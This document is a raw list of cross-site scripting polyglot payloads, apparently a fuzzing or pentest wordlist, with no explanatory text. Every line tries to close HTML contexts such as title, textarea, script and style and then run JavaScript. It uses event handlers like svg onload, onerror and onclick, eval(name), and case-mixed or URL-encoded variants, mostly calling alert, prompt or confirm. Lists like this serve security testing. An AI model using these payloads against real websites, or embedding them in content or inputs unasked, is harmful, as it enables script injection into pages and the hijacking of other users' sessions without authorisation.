"'--><svg onload=alert(123)> </title></textarea></frameset></template></style></script></noembed></noscript><script>alert(123)</script>
"><svg onload=alert(1)>javascript:/*--></marquee></script></title></textarea></noscript></style></xmp>">[img=1]<img -/style=-=expression&#40&#47;&#42;'/-/*&#39;,/**/eval(name)//&#41;;width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>"><script>alert(1)</script>#"><img src="x" onerror=prompt(1);>""--!><Svg/OnLoad=(confirm)(/xss/)>
'--><svg onload=alert()> javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
'--><svg onload=alert()><script>alert()</script> }'<script>alert()</script>'{
"><svg onload=alert()> '--><svg onload=alert()> <script>alert()</script> </textarea><script>alert()</script><textarea>
<svg onload="     void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e';     "></svg>
</template></frameset><script>alert(1)</script>
</template></noembed></script></option></select></style></noscript></textarea></title>'"> --> <script> alert ("HI"); </script>
</textarea><script>alert(1)</script>
">'>--></textarea></title></script><script>alert();//</script>
/</title/'/</style/</script/--><p" %0A onclick=alert()//>*/alert()/*
 /</title/'/</style/</script/--><p"   onclick=alert()//>*/alert()/*
/</title/'/</style/</script/--><p"  onclick=alert()//>*/alert()/*
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p"  onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*  
";';/*--></title></style></textarea></noscript></noembed></template><script>alert(1)</script><svg/onload='+/\"/+/`/+/onmouseover=1/+/[*/[]/+ alert(1)//'>
--></title></style></textarea></noscript></select></script></noembed></template></frameset></iframe>"//'//><svg/onload=alert(1)>
'"--></title></style></textarea></script><a%0A/onclick=alert() )>x
//'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
//'/</title></style></textarea></script>--><p"   onclick=alert()//>*/alert()/*
'"--></title></textarea></noscript></noembed></template></frameset></option></select></script></style><svg onload=alert()>'>
"'></title></textarea></noscript></noembed></template></frameset>-->*/ <script>alert(1);</script>
'"--></title></textarea></noscript></style></noembed></template></script><svg onload=alert()> /*-/*`/*\`'"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//
<!--"'--></title></textarea></style></noscript></noembed></template></frameset></option></select><svg onload=alert()>
">-->'>--></title>--></textarea>--></style>--></noscript>--></noembed>--></template>--></frameset>--></script>--><script>alert()</script>
'"--></title></textarea></style></noscript></noembed></template></frameset><svg onload=alert()>
"'</title></textarea></style></noscript></template></noembed></select></option>--><svg/onload=alert()>
var ()=\`\`;javascript://</title></style></textarea>--></script><a"//' %0D %0A onclick=alert()//>*/alert()/*
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ' onclick=alert();//'"></title></script></iframe></textarea><body onclick="alert()">
